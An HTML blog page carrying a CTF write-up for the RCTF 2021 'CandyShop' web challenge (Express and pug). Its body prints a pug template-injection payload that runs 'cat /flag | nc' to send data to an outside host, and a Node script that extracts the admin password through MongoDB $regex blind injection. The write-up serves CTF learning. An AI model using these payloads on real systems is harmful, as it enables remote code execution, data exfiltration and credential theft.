<!DOCTYPE html>
<html lang="en">
<!-- Beautiful Jekyll 5.0.0 | Copyright Dean Attali 2020 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  

  

  <title>CandyShop Writeup</title>

  

  <meta name="description" content="CandyShop Attachment Read the source code of the website, we’ll find out that it’s driven by express.js &amp;amp; pug template engine. Then we’ll find out the wrong usage of pug in the code: src/routes/shop.js router.post('/order', checkLogin, checkActive, async (req, res) =&amp;gt; { let {username, candyname, address} = req.body let tpl_path...">

  

  

  <link rel="alternate" type="application/rss+xml" title="Cat Munch" href="/web/feed.xml">

  

  

  


  
    
      
  <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">


    
      
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css">


    
      
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic">


    
      
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800">


    
  

  
    
      <link rel="stylesheet" href="/web/assets/css/bootstrap-social.css">
    
      <link rel="stylesheet" href="/web/assets/css/beautifuljekyll.css">
    
  

  

  
  
  

  

  
  <meta property="og:site_name" content="Cat Munch">
  <meta property="og:title" content="CandyShop Writeup">
  <meta property="og:description" content="CandyShop Attachment Read the source code of the website, we’ll find out that it’s driven by express.js &amp;amp; pug template engine. Then we’ll find out the wrong usage of pug in the code: src/routes/shop.js router.post('/order', checkLogin, checkActive, async (req, res) =&amp;gt; { let {username, candyname, address} = req.body let tpl_path...">

  

  
  <meta property="og:type" content="article">
  <meta property="og:article:author" content="">
  <meta property="og:article:published_time" content="2021-09-13T00:00:00+00:00">
  <meta property="og:url" content="/web/writeup/rctf2021/2021/09/13/candyshop-writeup.html">
  <link rel="canonical" href="/web/writeup/rctf2021/2021/09/13/candyshop-writeup.html">
  

  
  <meta name="twitter:card" content="summary">
  
  <meta name="twitter:site" content="@">
  <meta name="twitter:creator" content="@">

  <meta property="twitter:title" content="CandyShop Writeup">
  <meta property="twitter:description" content="CandyShop Attachment Read the source code of the website, we’ll find out that it’s driven by express.js &amp;amp; pug template engine. Then we’ll find out the wrong usage of pug in the code: src/routes/shop.js router.post('/order', checkLogin, checkActive, async (req, res) =&amp;gt; { let {username, candyname, address} = req.body let tpl_path...">

  

  


  

  

</head>


<body>

  


  <nav class="navbar navbar-expand-md navbar-light fixed-top navbar-custom top-nav-regular"><a class="navbar-brand" href="/web">Cat Munch</a><button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>

  <div class="collapse navbar-collapse" id="main-navbar">
    <ul class="navbar-nav ml-auto"></ul>
  </div>

  

</nav>


  <!-- TODO this file has become a mess, refactor it -->







<header class="header-section ">

<div class="intro-header no-img">
  <div class="container-md">
    <div class="row">
      <div class="col-xl-8 offset-xl-2 col-lg-10 offset-lg-1">
        <div class="post-heading">
          <h1>CandyShop Writeup</h1>
          

          
            <span class="post-meta">Posted on September 13, 2021</span>
            
            
          
        </div>
      </div>
    </div>
  </div>
</div>
</header>





<div class=" container-md ">
  <div class="row">
    <div class=" col-xl-8 offset-xl-2 col-lg-10 offset-lg-1 ">

      

      

      <article role="main" class="blog-post">
        <h2 id="candyshop">CandyShop</h2>

<p><a href="https://github.com/catmunch/oss/blob/master/CandyShop.zip?raw=true">Attachment</a></p>

<p>Read the source code of the website, we’ll find out that it’s driven by express.js &amp; pug template engine.</p>

<p>Then we’ll find out the wrong usage of pug in the code:</p>

<p><code class="language-plaintext highlighter-rouge">src/routes/shop.js</code></p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/order</span><span class="dl">'</span><span class="p">,</span> <span class="nx">checkLogin</span><span class="p">,</span> <span class="nx">checkActive</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="kd">let</span> <span class="p">{</span><span class="nx">username</span><span class="p">,</span> <span class="nx">candyname</span><span class="p">,</span> <span class="nx">address</span><span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span>
    <span class="kd">let</span> <span class="nx">tpl_path</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">../views/confirm.pug</span><span class="dl">'</span><span class="p">)</span>
    <span class="nx">fs</span><span class="p">.</span><span class="nx">readFile</span><span class="p">(</span><span class="nx">tpl_path</span><span class="p">,</span> <span class="p">(</span><span class="nx">err</span><span class="p">,</span> <span class="nx">result</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
            <span class="nx">res</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="dl">'</span><span class="s1">error</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span><span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Fail to load template!</span><span class="dl">'</span><span class="p">})</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="kd">let</span> <span class="nx">tpl</span> <span class="o">=</span> <span class="nx">result</span>
                <span class="p">.</span><span class="nx">toString</span><span class="p">()</span>
                <span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">USERNAME</span><span class="dl">'</span><span class="p">,</span> <span class="nx">username</span><span class="p">)</span>
                <span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">CANDYNAME</span><span class="dl">'</span><span class="p">,</span> <span class="nx">candyname</span><span class="p">)</span>
                <span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">ADDRESS</span><span class="dl">'</span><span class="p">,</span> <span class="nx">address</span><span class="p">)</span>
            <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">pug</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="nx">tpl</span><span class="p">,</span> <span class="nx">options</span><span class="o">=</span><span class="p">{</span><span class="na">filename</span><span class="p">:</span> <span class="nx">tpl_path</span><span class="p">}))</span>
        <span class="p">}</span>
    <span class="p">})</span>
<span class="p">})</span>
</code></pre></div></div>

<p>It uses simply REPLACE to inject the info, rather than use the pug engine!</p>

<p>Then we can try to let the pug execute arbitrary code on the server side. Google it, and we know we just need to prepend <code class="language-plaintext highlighter-rouge">- </code> to our javascript code, then it should work fine.</p>

<p>So we let the username be</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="dl">'</span><span class="s1">)
                        - process.mainModule.constructor._load(</span><span class="dl">'</span><span class="nx">child_process</span><span class="dl">'</span><span class="s1">).exec(</span><span class="dl">'</span><span class="nx">cat</span> <span class="o">/</span><span class="nx">flag</span> <span class="o">|</span> <span class="nx">nc</span> <span class="mf">8.8</span><span class="p">.</span><span class="mf">8.8</span> <span class="mi">8888</span> <span class="dl">'</span><span class="s1">)
                        .p(</span><span class="dl">'</span>
</code></pre></div></div>

<p>Then after it’s injected to the template, the template should be like</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">extends</span> <span class="nx">layout</span>


<span class="nx">block</span> <span class="nx">content</span>
    <span class="p">.</span><span class="nx">container</span>
        <span class="p">.</span><span class="nx">row</span><span class="p">.</span><span class="nx">justify</span><span class="o">-</span><span class="nx">content</span><span class="o">-</span><span class="nx">center</span>
            <span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="mi">6</span><span class="p">.</span><span class="nx">mt</span><span class="o">-</span><span class="mi">5</span>
                <span class="p">.</span><span class="nx">card</span>
                    <span class="p">.</span><span class="nx">card</span><span class="o">-</span><span class="nx">header</span><span class="p">.</span><span class="nx">text</span><span class="o">-</span><span class="nx">center</span><span class="p">.</span><span class="nx">font</span><span class="o">-</span><span class="nx">weight</span><span class="o">-</span><span class="nx">bold</span><span class="p">(</span><span class="nx">style</span><span class="o">=</span><span class="dl">'</span><span class="s1">background-color: pink;color: white</span><span class="dl">'</span><span class="p">)</span> <span class="nx">Confirm</span> <span class="nx">Your</span> <span class="nx">Order</span>
                    <span class="p">.</span><span class="nx">card</span><span class="o">-</span><span class="nx">body</span>
                    <span class="nx">form</span><span class="p">(</span><span class="nx">action</span><span class="o">=</span><span class="dl">'</span><span class="s1">/shop/confirm</span><span class="dl">'</span> <span class="nx">method</span><span class="o">=</span><span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">)</span>
                        <span class="p">.</span><span class="nx">form</span><span class="o">-</span><span class="nx">group</span><span class="p">.</span><span class="nx">row</span>
                            <span class="nx">label</span><span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="nx">form</span><span class="o">-</span><span class="nx">label</span><span class="p">.</span><span class="nx">text</span><span class="o">-</span><span class="nx">md</span><span class="o">-</span><span class="nx">right</span><span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="mi">4</span><span class="p">(</span><span class="k">for</span><span class="o">=</span><span class="dl">'</span><span class="s1">username</span><span class="dl">'</span><span class="p">)</span> <span class="nx">User</span> <span class="nx">Name</span>
                            <span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="mi">6</span>
                                <span class="nx">input</span><span class="err">#</span><span class="nx">username</span><span class="p">.</span><span class="nx">form</span><span class="o">-</span><span class="nx">control</span><span class="p">(</span><span class="nx">type</span><span class="o">=</span><span class="dl">'</span><span class="s1">text</span><span class="dl">'</span> <span class="nx">name</span><span class="o">=</span><span class="dl">'</span><span class="s1">username</span><span class="dl">'</span> <span class="nx">value</span><span class="o">=</span><span class="dl">''</span><span class="p">)</span>
                        <span class="o">-</span> <span class="nx">process</span><span class="p">.</span><span class="nx">mainModule</span><span class="p">.</span><span class="kd">constructor</span><span class="p">.</span><span class="nx">_load</span><span class="p">(</span><span class="dl">'</span><span class="s1">child_process</span><span class="dl">'</span><span class="p">).</span><span class="nx">exec</span><span class="p">(</span><span class="dl">'</span><span class="s1">cat /flag | nc 8.8.8.8 8888 </span><span class="dl">'</span><span class="p">)</span>
                        <span class="p">.</span><span class="nx">p</span><span class="p">(</span><span class="dl">''</span> <span class="nx">readonly</span><span class="p">)</span>
                        <span class="p">.</span><span class="nx">form</span><span class="o">-</span><span class="nx">group</span><span class="p">.</span><span class="nx">row</span>
                            <span class="nx">label</span><span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="nx">form</span><span class="o">-</span><span class="nx">label</span><span class="p">.</span><span class="nx">text</span><span class="o">-</span><span class="nx">md</span><span class="o">-</span><span class="nx">right</span><span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="mi">4</span><span class="p">(</span><span class="k">for</span><span class="o">=</span><span class="dl">'</span><span class="s1">candyname</span><span class="dl">'</span><span class="p">)</span> <span class="nx">Candy</span> <span class="nx">Name</span>
                            <span class="p">.</span><span class="nx">col</span><span class="o">-</span><span class="mi">6</span>
                                <span class="nx">input</span><span class="err">#</span><span class="nx">candyname</span><span class="p">.</span><span class="nx">form</span><span class="o">-</span><span class="nx">control</span><span class="p">(</span><span class="nx">type</span><span class="o">=</span><span class="dl">'</span><span class="s1">text</span><span class="dl">'</span> <span class="nx">name</span><span class="o">=</span><span class="dl">'</span><span class="s1">candyname</span><span class="dl">'</span> <span class="nx">value</span><span class="o">=</span><span class="dl">'</span><span class="s1">CANDYNAME</span><span class="dl">'</span> <span class="nx">readonly</span><span class="p">)</span>
</code></pre></div></div>

<p>Then our code can be executed and we can get the flag.</p>

<p>But wait, we can’t call the <code class="language-plaintext highlighter-rouge">POST /order</code> API cause we don’t have an active account. so we should active our account or just use the admin account.</p>

<p>Sadly there’s probably no way to active an account, so we can try to get the admin password.</p>

<p>How?</p>

<p>Observe the login code carefully, there seems to be a useless <code class="language-plaintext highlighter-rouge">if</code> statement</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">let</span> <span class="nx">rec</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nx">Users</span><span class="p">.</span><span class="nx">find</span><span class="p">({</span><span class="na">username</span><span class="p">:</span> <span class="nx">username</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="nx">password</span><span class="p">})</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">rec</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">rec</span><span class="p">.</span><span class="nx">username</span> <span class="o">===</span> <span class="nx">username</span> <span class="o">&amp;&amp;</span> <span class="nx">rec</span><span class="p">.</span><span class="nx">password</span> <span class="o">===</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">cookie</span><span class="p">(</span><span class="dl">'</span><span class="s1">token</span><span class="dl">'</span><span class="p">,</span> <span class="nx">rec</span><span class="p">,</span> <span class="p">{</span><span class="na">signed</span><span class="p">:</span> <span class="kc">false</span><span class="p">})</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">redirect</span><span class="p">(</span><span class="dl">'</span><span class="s1">/shop</span><span class="dl">'</span><span class="p">)</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="nx">res</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="dl">'</span><span class="s1">login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span><span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">You Bad Bad &gt;_&lt;</span><span class="dl">'</span><span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="nx">res</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="dl">'</span><span class="s1">login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span><span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Login Failed!</span><span class="dl">'</span><span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>How can mongodb find a user that its username or password doesn’t equal to the input one?</p>

<p>We then find another snippet</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">router</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/register</span><span class="dl">'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span>
    <span class="kd">let</span> <span class="p">{</span><span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">body</span>
    <span class="k">if</span> <span class="p">(</span><span class="k">typeof</span><span class="p">(</span><span class="nx">username</span><span class="p">)</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">string</span><span class="dl">'</span><span class="p">)</span>
        <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">status</span><span class="p">(</span><span class="mi">400</span><span class="p">)</span>
</code></pre></div></div>

<p>Seems like if the username isn’t a string, it will cause some unexpected behaviors.</p>

<p>Then we search for the mongodb docs, and we found out we can pass an object to it to perform advanced search like regex.</p>

<p>Therefore, we can try to post /login with parameter <code class="language-plaintext highlighter-rouge">password[$regex]=*</code>, and we get the response <code class="language-plaintext highlighter-rouge">You Bad Bad &gt;_&lt;</code>.</p>

<p>But if the regex doesn’t match the password, we’ll get <code class="language-plaintext highlighter-rouge">Login Failed</code>.</p>

<p>So just use SQL blind injection, write a script to get the password</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">axios</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">axios</span><span class="dl">'</span><span class="p">);</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">test</span><span class="p">(</span><span class="nx">known</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">URLSearchParams</span><span class="p">()</span>
    <span class="nx">params</span><span class="p">.</span><span class="nx">append</span><span class="p">(</span><span class="dl">'</span><span class="s1">username</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">rabbit</span><span class="dl">'</span><span class="p">);</span>
    <span class="nx">params</span><span class="p">.</span><span class="nx">append</span><span class="p">(</span><span class="dl">'</span><span class="s1">password[$regex]</span><span class="dl">'</span><span class="p">,</span><span class="s2">`^</span><span class="p">${</span><span class="nx">known</span><span class="p">}</span><span class="s2">.*$`</span><span class="p">);</span>
    <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">axios</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">http://&lt;target host&gt;/user/login</span><span class="dl">'</span><span class="p">,</span><span class="nx">params</span><span class="p">,{</span>
        <span class="na">headers</span><span class="p">:</span> <span class="p">{</span>
            <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/x-www-form-urlencoded</span><span class="dl">'</span>
        <span class="p">}</span>
    <span class="p">})</span>
    <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">data</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">'</span><span class="s1">You Bad Bad</span><span class="dl">'</span><span class="p">)</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span>
<span class="p">}</span>
<span class="nx">charset</span> <span class="o">=</span> <span class="p">[</span><span class="dl">'</span><span class="s1">0</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">1</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">2</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">3</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">4</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">5</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">6</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">7</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">8</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">9</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">c</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">d</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">e</span><span class="dl">'</span><span class="p">,</span><span class="dl">'</span><span class="s1">f</span><span class="dl">'</span><span class="p">]</span>
<span class="nx">cur</span> <span class="o">=</span> <span class="dl">''</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">main</span><span class="p">(){</span>
    <span class="k">for</span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">i</span><span class="o">&lt;</span><span class="mi">64</span><span class="p">;</span><span class="o">++</span><span class="nx">i</span><span class="p">){</span>
        <span class="k">for</span><span class="p">(</span><span class="kd">let</span> <span class="nx">j</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">j</span><span class="o">&lt;</span><span class="mi">16</span><span class="p">;</span><span class="o">++</span><span class="nx">j</span><span class="p">){</span>
            <span class="k">if</span><span class="p">(</span><span class="k">await</span> <span class="nx">test</span><span class="p">(</span><span class="nx">cur</span><span class="o">+</span><span class="nx">charset</span><span class="p">[</span><span class="nx">j</span><span class="p">])){</span>
                <span class="nx">cur</span> <span class="o">+=</span> <span class="nx">charset</span><span class="p">[</span><span class="nx">j</span><span class="p">]</span>
                <span class="nx">process</span><span class="p">.</span><span class="nx">stdout</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="nx">charset</span><span class="p">[</span><span class="nx">j</span><span class="p">]);</span>
                <span class="k">break</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="nx">main</span><span class="p">()</span>
</code></pre></div></div>

<p>Then we can get the flag.</p>

      </article>

      

      

      

      <ul class="pagination blog-pager">
        
        
        <li class="page-item next">
          <a class="page-link" href="/web/writeup/hackergame/2021/11/01/hackergame2021-writeup-part-1.html" data-toggle="tooltip" data-placement="top" title="Hackergame 2021 Writeup Part 1(Entry level)">Next Post →</a>
        </li>
        
      </ul>
      

    </div>
  </div>
</div>


  <footer>
  <div class="container-md beautiful-jekyll-footer">
    <div class="row">
      <div class="col-xl-8 offset-xl-2 col-lg-10 offset-lg-1">
      <ul class="list-inline text-center footer-links"></ul>

      
      <p class="copyright text-muted">
      
      2021

      

      
      </p>
      <!-- Please don't remove this, keep my open source work credited :) -->
      <p class="theme-by text-muted">
        Powered by
        <a href="https://beautifuljekyll.com">Beautiful Jekyll</a>
      </p>
      </div>
    </div>
  </div>
</footer>


  
  
    
  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha256-4+XzXVhsDmqanXGHaHvgh1gMQKX40OUvDEBTu8JcmNs=" crossorigin="anonymous"></script>


  
    
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>


  
    
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>


  



  
    <!-- doing something a bit funky here because I want to be careful not to include JQuery twice! -->
    
      <script src="/web/assets/js/beautifuljekyll.js"></script>
    
  









</body>
</html>
